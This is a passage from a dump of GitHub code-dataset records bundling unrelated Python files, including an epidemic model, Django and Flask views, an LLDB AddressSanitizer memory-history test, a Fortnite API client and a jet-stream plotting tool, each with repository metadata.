[{}] {}\".format(i, _hide_hash(path)))\n i = i + 1\n _show_info(path)\n out(\"\")\n out(\"Current Project: {}\".format(project))\n\n elif len(paths) == 1:\n out(\"Selected must-gather: {}\".format(_hide_hash(paths[0])))\n _show_info(paths[0])\n out(\" Current Project: {}\".format(project))\n","repo_name":"kxr/o-must-gather","sub_path":"omg/use/show_mg_info.py","file_name":"show_mg_info.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"66"} +{"seq_id":"13953408287","text":"#!/usr/bin/env python\n\nimport math\nimport numpy as np\nfrom ddeint import ddeint\nimport matplotlib.pyplot as plt\n\n# Elements:\n# 0: Uninfected\n# 1: Number incubating\n# 2: Number contagious\n# 3: Number observed\n\nP=1e9\n\nTi=14.0\nTc=7.0\n\ndef impulse(t):\n if 0.0 int:\n edge_count_at = defaultdict(int)\n for row in wall:\n prefix = 0\n for i,brick_width in enumerate(row):\n if i < len(row) - 1:\n prefix += brick_width\n edge_count_at[prefix] += 1\n return len(wall) - (max(edge_count_at.values()) if edge_count_at else 0)\n \n ","repo_name":"Mingyu-Kim-001/LeetCode","sub_path":"Arrays/medium/554. Brick Wall.py","file_name":"554. 
Brick Wall.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42999183549","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.views import generic\nfrom django.conf import settings\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic.edit import DeleteView\n\nimport datetime\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom .models import Student\nfrom django.shortcuts import render\nfrom .forms import StudentForm\n\n\n# Create your views here.\n\n\ndef home(request):\n if request.method == 'POST':\n form = StudentForm(request.POST, request.FILES)\n print(form.fields['doc_profile_pic'])\n if form.is_valid():\n student = form.save()\n print(\"save\")\n context = {'submit_check': 1, 'basic_form': StudentForm(\n initial={'gr_number': '55564', 'handicapped': False, 'jee_total': 120})}\n print(context.values())\n else:\n print(\"else\")\n context = {'submit_check': 0, }\n print(context.values())\n print(form.errors)\n return HttpResponseRedirect('/test/')\n\n else:\n context = {\n 'basic_form': StudentForm(initial={'gr_number': '55564', 'handicapped': False, 'jee_total': 120}),\n }\n\n return render(request, 'test/index.html', context)\n\n\ndef login(request):\n return render(request, 'test/login.html')\n\n\n\n\n\ndef grid_view(request):\n return render(request, 'test/all_students_grid.html', {\n 'root': settings.MEDIA_ROOT,\n 'all_students': Student.objects.all()\n })\n\n\ndef list_view(request):\n return render(request, 'test/all_students_list.html', {\n 'root': settings.MEDIA_ROOT,\n 'all_students': Student.objects.all()\n })\n\n\n# class DetailView(generic.ListView):\n# context = {\n# 'root': settings.MEDIA_ROOT,\n# 'all_students': Student.objects.all()\n# }\n#\n# # context_object_name = 'all_students' # optional...to override default object name object_list\n# def get_queryset(self):\n# return render()\n\n# class StudentDelete(DeleteView):\n# model = Student\n# success_url = reverse_lazy('home:all_students_list')\n\n\ndef detail_view(request, student_id):\n student = get_object_or_404(Student, pk=student_id)\n return render(request, 'test/details.html', {'student': student, 'basic_form': StudentForm()})\n\n\ndef update(request, student_id):\n # return HttpResponse(\"Hi\")\n student = get_object_or_404(Student, pk=student_id)\n print(student.doc_jee_marksheet.url)\n return render(request, 'test/update.html', {'basic_form': StudentForm(instance = student)})\n","repo_name":"akzarma/mysite","sub_path":"temp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11476450974","text":"\n# coding: utf-8\n\n# In[2]:\n\n\nimport csv\n\n\n# In[7]:\n\ndef count_votes():\n with open('PyPollData.csv') as file:\n poll_data = csv.reader(file, delimiter=\",\")\n next(poll_data)\n total_votes = 0\n candidates = {}\n for row in poll_data:\n candidate = row[2]\n if candidate not in candidates:\n candidates[candidate] = 1\n else:\n candidates[candidate] += 1\n total_votes += 1\n vote_candidates = []\n for k, v in candidates.items():\n vote_candidates.append(f'{k}: {round((v/total_votes)*100, 2)}% ({v})')\n candidate_list = \"\\n\".join(vote_candidates)\n winner = max(candidates.keys(), key=(lambda k: candidates[k]))\n return \\\n f'''Election 
Results\n    ---------------------\n    Total Votes: {total_votes}\n    ---------------------\n    {candidate_list}\n    ---------------------\n    Winner: {winner}\n    ---------------------\n    '''\noutput = count_votes()\nprint(output)\nwith open(\"pypoll.txt\", \"w\") as file:\n    file.write(output)\n","repo_name":"j9stuart/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74471499411","text":"from .http import HTTPClient\nfrom .cosmetics import Cosmetics\nfrom .epic import EpicEndpoints\nfrom .meshes import Meshes\nfrom .shop import BRShop\nfrom .aes import FortniteAES\n\nfrom typing import Any\n\n\nclass APIClient:\n    def __init__(self) -> None:\n        self.http = HTTPClient()\n\n        self.cosmetics = Cosmetics(self)\n        self.epic = EpicEndpoints(self)\n        self.meshes = Meshes(self)\n\n    async def get_shop(self) -> BRShop:\n        \"\"\"|coro|\n\n        Gets a parsed version of the current battle royale shop (updates every day at UTC 0:00).\n\n        Returns\n        -------\n        :class:`BRShop`:\n            BRShop object containing featured, daily, specialFeatured and specialDaily.\n        \"\"\"\n\n        data = await self.http.request(\n            method=\"GET\",\n            url=\"/shop/br\"\n        )\n\n        return BRShop(data)\n\n    async def get_dynamic_aes_keys(self) -> list:\n        \"\"\"|coro|\n\n        Gets all current dynamic AES keys. Returns None if there are no dynamic AES keys.\n\n        Returns\n        -------\n        :class:`list[:class:`FortniteAES`]`:\n            List containing FortniteAES objects containing dynamic key information.\n        \"\"\"\n\n        data = await self.http.request(\n            method=\"GET\",\n            url=\"/aes/dynamic\"\n        )\n\n        return [FortniteAES(dynamic_key) for dynamic_key in data] if len(data) != 0 else None\n\n    async def get_main_aes_key(self) -> str:\n        \"\"\"|coro|\n\n        Gets the main AES key in its 32 byte hex form. 
Updates within a few seconds of an update.\n\n        Returns\n        -------\n        :class:`str`:\n            Main AES key in 32 byte hex form.\n        \"\"\"\n\n        return await self.http.request(method=\"GET\", url=\"/aes/main\")\n\n","repo_name":"xMistt/snailapi","sub_path":"snailapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"12376871981","text":"import sys,os\nsys.path.append(os.getcwd())\n\nfrom src.components.server.adapters.storage_adapter import StorageAdapter\nfrom src.components.server.adapters.memory_storage_adapter import MemoryStorageAdapter\nfrom src.components.server.controllers.controller import Controller\nfrom src.components.server.repositories.repository import Repository\nfrom src.common.actions import Actions\nfrom src.common.models.model import Model\nfrom src.common.request import Request\nfrom src.components.server.request_router import RequestRouter\nfrom uuid import UUID, uuid4 as Uuid\n\n\nid=Uuid()\n\nclass MockModel(Model):\n    def from_json(json_object: str) -> object:\n        return MockModel(id)\n\n\nMOCK_MODEL_ROUTE = \"MockModel\"\nMOCK_MODEL = MockModel\n\ndef prepare_mock_repository(mock_model, storage: StorageAdapter) -> Repository:\n    repository = Repository(mock_model)\n    repository.storage = storage\n    print(repository.storage)\n    return repository\n\ndef prepare_mock_controller(mock_repository: Repository) -> Controller:\n    controller = Controller(Model)\n    controller.repository = mock_repository\n    return controller\n\nstorage=MemoryStorageAdapter()\nmock_repository = prepare_mock_repository(MOCK_MODEL, storage)\nmock_controller = prepare_mock_controller(mock_repository)\n\ntest_context={\n    \"controllers\": {\n        MOCK_MODEL_ROUTE: mock_controller,\n    },\n    \"repositories\": {\n        \"mock_repository\": mock_repository\n    },\n    \"request_args\": {\n        \"route\": MOCK_MODEL_ROUTE,\n        \"payload\": MOCK_MODEL(id),\n        \"action\": Actions.CREATE\n    }\n}\n\nclass TestController:\n    def test_create_mock_object(self):\n        request = Request(**test_context[\"request_args\"])\n\n        request_router=RequestRouter()\n        request_router.controllers = test_context['controllers']\n\n        routed_controller = request_router.get_controller(request)\n\n        routed_controller.receive_request(request)\n\n        result = storage.findById(id, MockModel.__name__)\n\n        assert result.id == id","repo_name":"lucas-dolsan/dsd-socket-t1","sub_path":"test/integration/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18376814762","text":"from .base import BaseTcm\n\n\nclass Zephyr(BaseTcm):\n    SYNC_ENABLED = \"com.zebrunner.app/tcm.zephyr.sync.enabled\"\n    SYNC_REAL_TIME = \"com.zebrunner.app/tcm.zephyr.sync.real-time\"\n    TEST_CYCLE_KEY = \"com.zebrunner.app/tcm.zephyr.test-cycle-key\"\n    JIRA_PROJECT_KEY = \"com.zebrunner.app/tcm.zephyr.jira-project-key\"\n    TEST_CASE_KEY = \"com.zebrunner.app/tcm.zephyr.test-case-key\"\n\n    @staticmethod\n    def disable_sync() -> None:\n        Zephyr._verify_no_tests()\n        Zephyr._attach_label(Zephyr.SYNC_ENABLED, \"false\")\n\n    @staticmethod\n    def enable_real_time_sync() -> None:\n        Zephyr._verify_no_tests()\n        Zephyr._attach_label(Zephyr.SYNC_REAL_TIME, \"true\")\n\n    @staticmethod\n    def set_test_cycle_key(key: str) -> None:\n        Zephyr._verify_no_tests()\n        Zephyr._attach_label(Zephyr.TEST_CYCLE_KEY, key)\n\n    @staticmethod\n    def set_jira_project_key(key: str) -> 
None:\n Zephyr._verify_no_tests()\n Zephyr._attach_label(Zephyr.JIRA_PROJECT_KEY, key)\n\n @staticmethod\n def set_test_case_key(key: str) -> None:\n Zephyr._attach_label(Zephyr.TEST_CASE_KEY, key)\n","repo_name":"zebrunner/python-agent-robot","sub_path":"src/robotframework_zebrunner/tcm/zephyr.py","file_name":"zephyr.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"69916626772","text":"import os\nimport datetime\n\nfrom flask import Blueprint, flash, render_template, Markup, Response, request, redirect, url_for\nfrom flask_login import current_user, login_required\n\nfrom remainder.models import Sleep\nfrom remainder.main.utils import (\n hour_min, get_scalers, avg_delta,\n estimate_remaining_of_today, config_pie, encode_pie_chart,\n sql_query_to_csv\n)\nfrom remainder.main.forms import ContactForm\nfrom remainder.users.utils import send_email\n\n\nmain_bp = Blueprint('main', __name__)\n\n\n@main_bp.route('/main/')\n@login_required\ndef dashboard():\n daily_records = list(Sleep.query.filter_by(user=current_user).\n order_by(Sleep.up.desc()))\n\n page = request.args.get('page', 1, type=int)\n\n records_pagination = Sleep.query.filter_by(user=current_user).\\\n order_by(Sleep.up.desc()).paginate(page=page, per_page=5)\n\n # Summary part and Remaining Time part\n # Default information: NO RECORD\n dashboard = {\n 'avg_up': 'NO RECORD',\n 'avg_bed': 'NO RECORD',\n 'avg_sleep': 'NO RECORD',\n 'bed_time': 'NO RECORD',\n 'remaining': 'NO RECORD'\n }\n\n # If there's been no daily_records, use Default information in the view\n if len(daily_records) == 0:\n return render_template('/dashboard.html',\n records_pagination=records_pagination,\n dashboard=dashboard)\n\n else:\n # Summary part\n _, up_deltas, bed_deltas, sleep_sec = get_scalers(daily_records)\n\n avg_up = avg_delta(up_deltas)\n avg_bed = avg_delta(bed_deltas)\n avg_sleep = sum(sleep_sec) / len(sleep_sec)\n\n dashboard['avg_up'] = avg_up[7:12]\n dashboard['avg_bed'] = avg_bed[7:12]\n dashboard['avg_sleep'] = '{0[0]}h {0[1]}m'.format(hour_min(int(avg_sleep)))\n\n # Remaining Time part\n timezone = current_user.timezone\n up_today_dt = daily_records[0].up\n bed_time, remaining = estimate_remaining_of_today(avg_sleep, up_today_dt, timezone)\n dashboard['bed_time'] = str(bed_time)[-8:-3]\n dashboard['remaining'] = '{0[0]}h {0[1]}m'.format(hour_min(remaining))\n\n if remaining < 0:\n flash(\"Need a new record to refresh Remaining Time!\", 'alert')\n dashboard['remaining'] = '[Record for Today must be added]'\n\n # Pie-chart for Remaining Time\n plot_url = encode_pie_chart(config_pie(remaining, up_today_dt, timezone))\n\n pie_html_string = Markup(\n f''\n )\n\n return render_template('/dashboard.html',\n records_pagination=records_pagination,\n dashboard=dashboard,\n pie_html_string=pie_html_string)\n\n\n@main_bp.route('/main/download')\n@login_required\ndef download():\n daily_records = list(Sleep.query.filter_by(user=current_user).order_by(Sleep.up.desc()))\n if len(daily_records) == 0:\n flash('No records to download.', 'info')\n return redirect(url_for('main.dashboard'))\n csv = sql_query_to_csv(daily_records, columns_to_exclude=['user_id', 'id', '_sa_instance_state', 'created_at'])\n csv = csv.replace(',\\n', '\\n') # Remove unnecessary ',' at the EOL\n csv = csv.replace(' up', 'up') # Remove unnecessary whitespace before 'up'\n\n date = datetime.date.today().strftime('%Y%m%d')\n return Response(\n csv,\n mimetype=\"text/csv\",\n 
headers={\"Content-disposition\":\n f\"attachment; filename=record_{date}.csv\"})\n\n\n@main_bp.route('/main/contact', methods=['GET', 'POST'])\ndef contact():\n form = ContactForm()\n if form.validate_on_submit():\n admin_email = os.environ.get('EMAIL_REMAINDER')\n\n config_forward = {\n 'subject': f'Message from User ({form.firstname.data})',\n 'bodyText': f\"\"\"{form.firstname.data} {form.lastname.data} ({form.email.data}) wrote\\n\\nMessage:\\n{form.message.data}\"\"\",\n 'fromAddress': admin_email,\n 'toAddress': admin_email\n }\n send_email(config_forward)\n\n config_thank = {\n 'subject': f\"We've got your message!\",\n 'bodyText': f\"\"\"Dear {form.firstname.data},\\n\\n\nThank you for contacting us! We've received your message and will get back to you within 48 hours.\\n\nCheers,\\nRemainder Admin\\nREMAINDER\\nhttps://remainder-app.herokuapp.com/\"\"\",\n 'fromAddress': admin_email,\n 'toAddress': form.email.data\n }\n send_email(config_thank)\n flash(\"Thank you!\\nWe've received your message and will get back to you within 48 hours.\", 'success')\n return redirect(url_for('main.contact'))\n return render_template('contact.html', title='Contact Us', form=form)\n","repo_name":"kkkzn/remainder","sub_path":"remainder/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11619252239","text":"\"\"\"\nTest that ASan memory history provider returns correct stack traces\n\"\"\"\n\n\nimport lldb\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbplatform\nfrom lldbsuite.test import lldbutil\n\n\nclass AsanTestCase(TestBase):\n @skipIfFreeBSD # llvm.org/pr21136 runtimes not yet available by default\n @expectedFailureNetBSD\n @skipUnlessAddressSanitizer\n def test(self):\n self.build()\n self.asan_tests()\n\n def setUp(self):\n # Call super's setUp().\n TestBase.setUp(self)\n self.line_malloc = line_number(\"main.c\", \"// malloc line\")\n self.line_malloc2 = line_number(\"main.c\", \"// malloc2 line\")\n self.line_free = line_number(\"main.c\", \"// free line\")\n self.line_breakpoint = line_number(\"main.c\", \"// break line\")\n\n def asan_tests(self):\n target = self.createTestTarget()\n\n self.registerSanitizerLibrariesWithTarget(target)\n\n self.runCmd(\"breakpoint set -f main.c -l %d\" % self.line_breakpoint)\n\n # \"memory history\" command should not work without a process\n self.expect(\n \"memory history 0\",\n error=True,\n substrs=[\"Command requires a current process\"],\n )\n\n self.runCmd(\"run\")\n\n stop_reason = (\n self.dbg.GetSelectedTarget().process.GetSelectedThread().GetStopReason()\n )\n if stop_reason == lldb.eStopReasonExec:\n # On OS X 10.10 and older, we need to re-exec to enable\n # interceptors.\n self.runCmd(\"continue\")\n\n # the stop reason of the thread should be breakpoint.\n self.expect(\n \"thread list\",\n STOPPED_DUE_TO_BREAKPOINT,\n substrs=[\"stopped\", \"stop reason = breakpoint\"],\n )\n\n # test that the ASan dylib is present\n self.expect(\n \"image lookup -n __asan_describe_address\",\n \"__asan_describe_address should be present\",\n substrs=[\"1 match found\"],\n )\n\n # test the 'memory history' command\n self.expect(\n \"memory history 'pointer'\",\n substrs=[\n \"Memory deallocated by Thread\",\n \"a.out`f2\",\n \"main.c:%d\" % self.line_free,\n \"Memory allocated by Thread\",\n \"a.out`f1\",\n \"main.c:%d\" % self.line_malloc,\n ],\n )\n\n 
# do the same using SB API\n process = self.dbg.GetSelectedTarget().process\n val = (\n process.GetSelectedThread().GetSelectedFrame().EvaluateExpression(\"pointer\")\n )\n addr = val.GetValueAsUnsigned()\n threads = process.GetHistoryThreads(addr)\n self.assertEqual(threads.GetSize(), 2)\n\n history_thread = threads.GetThreadAtIndex(0)\n self.assertTrue(history_thread.num_frames >= 2)\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetFileSpec().GetFilename(),\n \"main.c\",\n )\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetLine(), self.line_free\n )\n\n history_thread = threads.GetThreadAtIndex(1)\n self.assertTrue(history_thread.num_frames >= 2)\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetFileSpec().GetFilename(),\n \"main.c\",\n )\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetLine(), self.line_malloc\n )\n\n # let's free the container (SBThreadCollection) and see if the\n # SBThreads still live\n threads = None\n self.assertTrue(history_thread.num_frames >= 2)\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetFileSpec().GetFilename(),\n \"main.c\",\n )\n self.assertEqual(\n history_thread.frames[1].GetLineEntry().GetLine(), self.line_malloc\n )\n\n # ASan will break when a report occurs and we'll try the API then\n self.runCmd(\"continue\")\n\n self.expect(\n \"thread list\",\n \"Process should be stopped due to ASan report\",\n substrs=[\"stopped\", \"stop reason = Use of deallocated memory\"],\n )\n\n # make sure the 'memory history' command still works even when we're\n # generating a report now\n self.expect(\n \"memory history 'another_pointer'\",\n substrs=[\n \"Memory allocated by Thread\",\n \"a.out`f1\",\n \"main.c:%d\" % self.line_malloc2,\n ],\n )\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/functionalities/asan/TestMemoryHistory.py","file_name":"TestMemoryHistory.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"22496501201","text":"\"\"\"\n Train resnet for celeba_a and celeba_b\n\"\"\"\nimport sys\n\nsys.path.append(r\"/local/home/david/Remote/PruneFramework\")\n\nfrom models.model_res import exp\n\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nif __name__ == '__main__':\n # an example to train resnet18 on CelebA\n tasks_celeba = [\n {\n 'model_name': 'resnet18',\n 'data_name': 'celeba',\n 'task_name': 'celeba_a'\n },\n {\n 'model_name': 'resnet18',\n 'data_name': 'celeba',\n 'task_name': 'celeba_b'\n },\n\n {\n 'model_name': 'resnet18',\n 'data_name': 'celeba',\n 'task_name': 'celeba'\n }\n ]\n\n for task in tasks_celeba:\n exp(\n model_name=task['model_name'],\n data_name=task['data_name'],\n task_name=task['task_name'],\n\n save_step='-1',\n plan_train=task.get('plan_train_normal',\n [\n {'n_epochs': 30, 'lr': 0.01},\n ]),\n path_model=task.get('path_model', None),\n batch_size=task.get('batch_size', None)\n )\n","repo_name":"MrDavidG/PruneFramework","sub_path":"exp_run/train_resnet.py","file_name":"train_resnet.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"22478558970","text":"# Last modified: Time-stamp: <2020-05-15 15:40:42 haines>\nr\"\"\" Jetstream vizualization (jsviz) tool using ECMWF Reanalysis v5 (ERA5) data\n\nPlots:\n\n(1) For a given time, show map (hmap) of mean sea level pressure (msl), average of\nupper troposphere (100-400 
hPa) wind speed (wspd), and geopotential height (hgt).\n(2) For a given time and longitude, show vertical section (vsec) of\nwspd and hgt through upper troposphere as latitude vs altitude.\n\nGUI:\n Longitude slider with prev and next buttons\n Time slider with prev and next buttons\n\nUsage:\nUsing IPython console, use magic to run code as if at unix prompt and\nprovide year and month to view e.g.\n%run jsviz.py [yyyy_mm]\n\nStart ipython in era5 python environment\n(era5) C:\\Users\\haines>ipython\n\nIn[]: cd Dropbox/peach/era5\nIn[]: %run jsviz.py 2018_01\nIn[]: plt.show()\n\nStill TODO:\n (Select how vertical section is plotted: press lvl or standard alt or msl altitude)\n\n\"\"\"\n\nimport sys\nfrom jsutil import *\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gs\nfrom matplotlib.widgets import Slider, Button, TextBox, CheckButtons\n\n# suppress warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Define default data bounds for analysis\nBB = dict( lon=[-140, -50],\n lat=[ 0, 80],\n lvl=[ 100, 500],\n dt = [datetime.datetime(2017,1,1), datetime.datetime(2017,2,1)]\n )\n\n# Define default bounding box for the figure\nBB_fig = dict( lon=[-140, -50],\n lat=[ 10, 60],\n lvl=[ 100, 500],\n dt = [datetime.datetime(2017,1,1), datetime.datetime(2017,2,1)]\n )\n\n# grab the coastline dataset\nlines = get_coastlines()\n\n# empty array for jet stream indices in data\njs = np.array([])\n# js column order defined as [JSDT,JSLVL,JSLAT,JSLON]\nJSDT,JSLVL,JSLAT,JSLON = 0,1,2,3\n\nlm = { 'num_peaks' : 4,\n 'min_distance' : 3,\n 'exclude_border' : 0,\n 'threshold_abs': 40.,\n #\n 'peaks_inside_toggle': 1,\n 'peaks_inside_threshold': 30.,\n 'peaks_inside_zonal_max': 0}\n\n\n# setup figure layout \nfig = plt.figure(figsize=(10, 7.5))\naxs = [fig.add_axes((.1,.1,.6,.7)),0,0]\n\n# main map\ntitle1_str = 'avg wspd (100-400 hPa), \\nhgt (300 hPa), msl pressure (hPa)'\naxs[0].set_title(title1_str, loc='right')\nt1 = axs[0].set_title('YYYY_MM_DD_HHMM', loc='left')\n# set aspect to simply mimic equidistant projection\naxs[0].set_aspect(1/np.cos(np.pi*np.mean(BB_fig['lat'])/180.)) \naxs[0].set_xlim(BB_fig['lon'][0],BB_fig['lon'][1])\naxs[0].set_ylim(BB_fig['lat'][0],BB_fig['lat'][1])\naxs[0].set_xlabel('Longitude (deg)')\naxs[0].set_ylabel('Latitude (deg)')\n# plot coastline/lakes\naxs[0].plot(lines['lon'],lines['lat'],'k',linewidth=0.5)\n# plot dotted vertical line at longitude of section plot\nl1 = axs[0].axvline(x=0, color='b', linestyle=':', linewidth=3.0)\n\n# wpsd color bar\n# get_positions returns Bbox, we want Bbox.bounds\nl,b,w,h = axs[0].get_position().bounds\naxs[1] = fig.add_axes([l,b-0.075,w,0.02])\n\n# do this now so that we can get adjusted ax get_position\nplt.draw()\nplt.pause(0.01)\n\n# vertical section\nl,b,w,h = axs[0].get_position().bounds\naxs[2] = fig.add_axes((l+w+0.01,b,.2,h))\n\n# some customizations (called on the axes of the section)\ntitle2_str = 'Section at lon=%.1f' % 0\nt2 = axs[2].set_title(title2_str)\naxs[2].set_ylim(BB_fig['lat'][0],BB_fig['lat'][1])\n# ax.set_xlabel('Level (hPa)')\n# ax.invert_xaxis()\naxs[2].set_xlabel('Altitude (km)')\naxs[2].yaxis.tick_right()\naxs[2].yaxis.set_label_position('right')\naxs[2].set_ylabel('Latitude (deg)')\n\n# blank data for initiating contours\nblank = np.array(np.ones((2,2), dtype=float))\n\n# plot filled contour for wmap(lon,lat)\ncflines = np.arange(20,100,10)\ncmap = plt.cm.get_cmap('BuPu')\ncf1 = axs[0].contourf(blank, blank, blank, cflines, cmap=cmap)\n# contour lines for hmap(lon,lat) and 
pmap(lon,lat)\ncslines1 = np.arange(7000, 11000, 100)\ncs11 = axs[0].contour(blank, blank, blank, cslines1, colors='k', linewidths=1.0, linestyles='solid')\ncs12 = axs[0].contour(blank, blank, blank, np.arange(870,1013,2),colors='gray', linewidths=1.0, linestyles='dashed')\ncs13 = axs[0].contour(blank, blank, blank, np.arange(1014,1085,2), colors='gray', linewidths=1.0, linestyles='solid')\n\n# plot filled contour lines for wsec(level, lat)\ncf2 = axs[2].contourf(blank, blank, blank, cflines, cmap=cmap)\n# plot line of hgt of 300hPa surface at lon\nl3, = axs[2].plot([], [], 'k-', linewidth=1.0)\ncslines2 = np.arange(100, 600, 100)\ncs2 = axs[2].contour(blank, blank, blank, cslines2, colors='b', linewidths=1.0, linestyles='solid')\n\n# eventually will try determine polar jet stream (pjs) and subtropical js (stjs)\n# plot jet stream locations on map\njsmap, = axs[0].plot([],[], 'ro', markersize=6)\n# and on vertical section\njsvec, = axs[2].plot([],[], 'ro', markersize=6)\n\ndef update_section_plot(val):\n # when lon slider changes\n global js,jsvec,l3,cf1,cf2,cs11,cs12,cs13,cs2 \n dtidx = int(sdt.val)\n lonidx = int(slon.val)\n\n # need to subset js for this longitude\n thislon = np.where( d['lon'][js[:,JSLON]] == d['lon'][lonidx] )\n which_lats = js[thislon,JSLAT]\n which_lvls = js[thislon,JSLVL]\n yy = d['lat'][which_lats]\n jsvec.set_ydata(yy)\n\n # determine ht at these lats for jet stream locatios\n ht = metpy.calc.add_pressure_to_height(d['ht_std'][which_lvls], d['pdiff'][dtidx,which_lats,lonidx].squeeze())\n xx = ht.m\n jsvec.set_xdata(xx)\n\n # all standard press hts mesh (dot.m is metpy way of getting array)\n vlats, lvls = np.meshgrid(d['lat'], d['level'])\n vlats, hts_std = np.meshgrid(d['lat'], d['ht_std'].m)\n # add units for metpy.calc\n hts_std = hts_std * d['ht_std'].units\n # compute new hts based on adding pdiff to standard heights\n hts = metpy.calc.add_pressure_to_height(hts_std, d['pdiff'][dtidx,:,lonidx].squeeze())\n wsec = d['wspd'][dtidx,:,:,lonidx].squeeze()\n # move the lon line and change title\n l1.set_xdata([ d['lon'][lonidx], d['lon'][lonidx]])\n title2_str = 'Section at lon=%.1f' % d['lon'][lonidx]\n t2.set_text(title2_str)\n # remove previous filled contours\n for tp in cf2.collections:\n tp.remove()\n # plot new contours\n # cf2 = ax.contourf(lvls, vlats, wsec, cflines, cmap=cmap)\n cf2 = axs[2].contourf(hts, vlats, wsec, cflines, cmap=cmap)\n # cf2 = axs[2].contour(hts, vlats, wsec, cflines, cmap=cmap)\n\n # pick data of 300hPa surface from hgt\n (lev300,) = (d['level']==300).nonzero()\n hsec = d['hgt'][dtidx,lev300,:,lonidx].squeeze()\n # \n l3.set_xdata(hsec)\n l3.set_ydata(d['lat'])\n \n hsec = d['hgt'][dtidx,:,:,lonidx].squeeze()\n # remove previous contours and labels\n for tp in cs2.collections:\n tp.remove()\n for lb in cs2.clabel():\n lb.remove()\n # plot new contours, pressure levels\n # cs2 = ax.contour(lvls, vlats, lvls, cslines, colors='k', linewidths=1.0, linestyles='solid')\n # contour lines for hsec is altitude (height) of constant pressure surface (level)\n cs2 = axs[2].contour(hsec, vlats, lvls, cslines2, colors='b', linewidths=1.0, linestyles='solid')\n cs2_lab = axs[2].clabel(cs2, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=False, use_clabeltext=True) \n\n plt.draw()\n\ndef update_both_plot(val):\n # when dt slider changes\n global js,jsmap,l3,cf1,cf2,cs11,cs12,cs13,cs2\n dtidx = int(sdt.val)\n lonidx = int(slon.val)\n\n # find jet stream locations each time step\n js = find_jets(d,dtidx,lm)\n 
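# As documented where js is declared above, each row of js is an index tuple in\n    # [JSDT, JSLVL, JSLAT, JSLON] column order, so js[:,JSLAT] and js[:,JSLON]\n    # below index directly into d['lat'] and d['lon'].\n    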
jsmap.set_ydata(d['lat'][js[:,JSLAT]])\n jsmap.set_xdata(d['lon'][js[:,JSLON]])\n \n dt_str = d['dt'][dtidx].strftime(\"%Y_%m_%d_%H%M\")\n t1.set_text(dt_str)\n lons, lats = np.meshgrid(d['lon'], d['lat'])\n # avg wspd between 100 and 400 hPa levels \n (lev14,) = ((d['level']>=100) & (d['level']<=400)).nonzero()\n wmap = np.mean(d['wspd'][dtidx,lev14,:,:], axis=0)\n # pick 300 hPa level of hgt\n (lev300,) = (d['level']==300).nonzero()\n hmap = d['hgt'][dtidx,lev300,:,:].squeeze()\n pmap = d['msl'][dtidx,:,:].squeeze()\n # remove previous all previous contours and labels\n c = cf1.collections\n c.extend(cs11.collections)\n c.extend(cs12.collections)\n c.extend(cs13.collections)\n for tp in c:\n tp.remove()\n l = cf1.clabel()\n l.extend(cs11.clabel())\n l.extend(cs12.clabel())\n l.extend(cs13.clabel())\n for lb in l:\n lb.remove()\n # plot filled contour for wmap(lon,lat)\n cf1 = axs[0].contourf(lons, lats, wmap, cflines, cmap=cmap)\n # contour lines for hmap(lon,lat) and pmap(lon,lat)\n cs11 = axs[0].contour(lons, lats, hmap, cslines1, colors='k', linewidths=1.0, linestyles='solid')\n cs11_lab = axs[0].clabel(cs11, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=True, use_clabeltext=True)\n # contour lines for pmap(lon,lat) (low pmap<1013 dashed) (high pmap>1013 solid)\n # ever recorded lowest 870 hPa (typhoon), highest 1085 hPa\n cs12 = axs[0].contour(lons, lats, pmap, np.arange(870,1013,2),colors='gray', linewidths=1.0, linestyles='dashed')\n cs12_lab = axs[0].clabel(cs12, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=True, use_clabeltext=True)\n cs13 = axs[0].contour(lons, lats, pmap, np.arange(1014,1085,2), colors='gray', linewidths=1.0, linestyles='solid')\n cs13_lab = axs[0].clabel(cs13, fontsize=8, inline=1, inline_spacing=10, fmt='%i',\n rightside_up=True, use_clabeltext=True)\n # plt.draw()\n update_section_plot(val)\n\ndef 